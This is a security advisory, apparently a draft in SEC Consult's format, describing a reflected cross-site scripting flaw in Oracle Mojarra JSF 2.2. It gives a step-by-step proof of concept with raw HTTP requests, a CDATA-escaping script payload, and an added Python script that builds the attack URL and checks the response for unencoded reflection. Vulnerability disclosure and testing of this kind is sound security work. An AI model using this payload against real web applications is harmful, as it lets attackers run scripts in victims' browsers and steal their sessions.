Confidentiality class: Internal & Partner
SEC Consult Vulnerability Lab Security Advisory < publishing date YYYYMMDD-0 >
=======================================================================
title: Reflected Cross-Site Scripting (XSS)
product: Oracle Mojarra JSF included in Java EE 7
vulnerable version: 2.2
fixed version:
CVE number:
impact: High
homepage: https://javaserverfaces.github.io/
found: 2018-11-12
by: Jean-Benjamin Rousseau (Office Zurich)
Guillaume Crouquet (Office Zurich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"JavaServer Faces technology simplifies building user interfaces for
JavaServer applications. Developers can build web applications by
assembling reusable UI components in a page; connecting these
components to an application data source; and wiring client-generated
events to server-side event handlers. This project provides information
on the continued development of the JavaServer Faces specification.
JavaServer Faces (JSF) is a JCP Standard technology for authoring
component based user interfaces on the Java EE platform."
Source: https://javaee.github.io/javaserverfaces-spec/
Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker
can execute arbitrary scripts in the context of the web application in the
victim's browser. Besides performing arbitrary actions within the
application with the victim's account or manipulating the application's
interface, the attacker can potentially steal session tokens, redirect
the victim to external pages and perform attacks against their browser.
SEC Consult recommends to [tbd vendor patch / workaround]
Vulnerability overview/description:
-----------------------------------
The Oracle Mojarra implementation of JavaServer Faces (JSF) v2.2, the
reference implementation of the JSF user interface standard included in
Java EE 7, is affected by a reflected Cross-Site Scripting (XSS)
vulnerability. Only web applications that issue AJAX requests and that set
the javax.faces.CLIENT_WINDOW_MODE context parameter to "url" in their
web.xml file are affected:
<context-param>
    <param-name>javax.faces.CLIENT_WINDOW_MODE</param-name>
    <param-value>url</param-value>
</context-param>
In this configuration the web application sends the javax.faces.ClientWindow
POST parameter with every AJAX request and the server reflects its value in
the AJAX response. Because the value of javax.faces.ClientWindow is not
properly sanitized (output-encoded) before it is reflected, an attacker who
gets a victim to open a crafted URL can inject arbitrary script.
Proof of concept:
-----------------
In this Proof of Concept, the tests are based on PrimeFaces v6.0,
an open source component framework for JSF. The same steps apply to
any web application running on Oracle Mojarra JSF 2.2 with the
configuration described above.
Step 1: Generate an AJAX request on the web application and intercept it.
POST /HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0 HTTP/1.1
Host: localhost:8080
Content-Length: 405
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://localhost:8080
X-Requested-With: XMLHttpRequest
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=2a616ef87aeed7521b02ceb4e163
Connection: close
javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0
Step 2: Transpose the POST body parameters into GET query parameters and
build a new URL from them.
http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0
Step 3: Strip out the javax.faces.ViewState GET parameter from the URL.
http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0
Step 4: Prefix the value of the javax.faces.ClientWindow GET parameter with
the following payload (the leading "]]>" closes the CDATA section of the
partial response into which the value is reflected, so the script element
that follows is parsed as markup):
]]><script>alert('SEC Consult')</script>
URL-encoded, as it is placed in the query string:
%5D%5D%3E%3Cscript%3Ealert('SEC+Consult')%3C/script%3E
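The following script is an added example for this advisory and is not SEC
Consult's or Mojarra's own code. It automates Steps 2 to 4 above for a
captured JSF AJAX request (transposing the POST body into query
parameters, dropping javax.faces.ViewState and prefixing the
javax.faces.ClientWindow value with the payload) and adds the check a
tester performs on the response: whether the payload is reflected outside
of CDATA, i.e. as markup the browser will execute. The captured request is
the one from Step 1; the partial-response bodies and their element ids are
constructed to illustrate the two outcomes and are not real server output.

```python
"""Build the reflected-XSS test URL for a JSF AJAX request and check the
partial response for an unencoded reflection.

Added example for this advisory (not SEC Consult's or Mojarra's code).
"""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Step 4 payload. The leading "]]>" terminates the CDATA section in which
# the ClientWindow value is reflected, so the <script> element that follows
# is parsed as XML markup rather than as character data.
PAYLOAD = "]]><script>alert('SEC Consult')</script>"

# Constructed sample: request line and body from Step 1 of the advisory.
CAPTURED_URL = ("http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml"
                "?jfwid=2a616ef87aeed7521b02ceb4e163:0")
CAPTURED_BODY = (
    "javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname"
    "&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname"
    "&javax.faces.partial.render=j_idt18%3Agrid"
    "&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18"
    "&j_idt18%3Afirstname=&j_idt18%3Asurname=surname"
    "&javax.faces.ViewState=7025249133904776332%3A-921340693957557245"
    "&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0"
)


def build_xss_url(url, body, payload=PAYLOAD):
    """Return the GET URL of Step 4 built from a captured AJAX POST."""
    parts = urlsplit(url)
    # Step 2: existing query parameters first, then the POST body parameters.
    params = parse_qsl(parts.query, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)
    # Step 3: drop the view state parameter.
    params = [(k, v) for k, v in params if k != "javax.faces.ViewState"]
    # Step 4: prefix the ClientWindow value with the payload.
    params = [(k, payload + v if k == "javax.faces.ClientWindow" else v)
              for k, v in params]
    # urlencode percent-encodes the payload ("<" -> %3C, space -> "+").
    return urlunsplit(parts._replace(query=urlencode(params)))


_CDATA_RE = re.compile(r"<!\[CDATA\[.*?\]\]>", re.S)


def reflected_as_markup(partial_response, marker="<script>"):
    """True if `marker` occurs outside every CDATA section of the response.

    A value reflected inside <![CDATA[...]]> is character data and inert;
    the payload's "]]>" is what moves the <script> element outside of it.
    """
    return marker in _CDATA_RE.sub("", partial_response)


# Constructed partial-response bodies (shape and update id are assumed).
# Properly encoded reflection: the payload stays inside the CDATA section.
RESPONSE_ENCODED = (
    "<partial-response><changes><update id=\"javax.faces.ClientWindow\">"
    "<![CDATA[]]&gt;&lt;script&gt;alert('SEC Consult')&lt;/script&gt;:0]]>"
    "</update></changes></partial-response>"
)
# Unencoded reflection: "]]>" closes the CDATA section, <script> is markup.
RESPONSE_REFLECTED = (
    "<partial-response><changes><update id=\"javax.faces.ClientWindow\">"
    "<![CDATA[]]><script>alert('SEC Consult')</script>:0]]>"
    "</update></changes></partial-response>"
)

if __name__ == "__main__":
    print(build_xss_url(CAPTURED_URL, CAPTURED_BODY))
    print("encoded response executes:", reflected_as_markup(RESPONSE_ENCODED))
    print("reflected response executes:", reflected_as_markup(RESPONSE_REFLECTED))
```

Run the script and open the printed URL in a browser that holds a valid
session for the application; the response check is meant for the body
returned by the server, which, with output encoding in place, keeps the
payload inside the CDATA section and would return False.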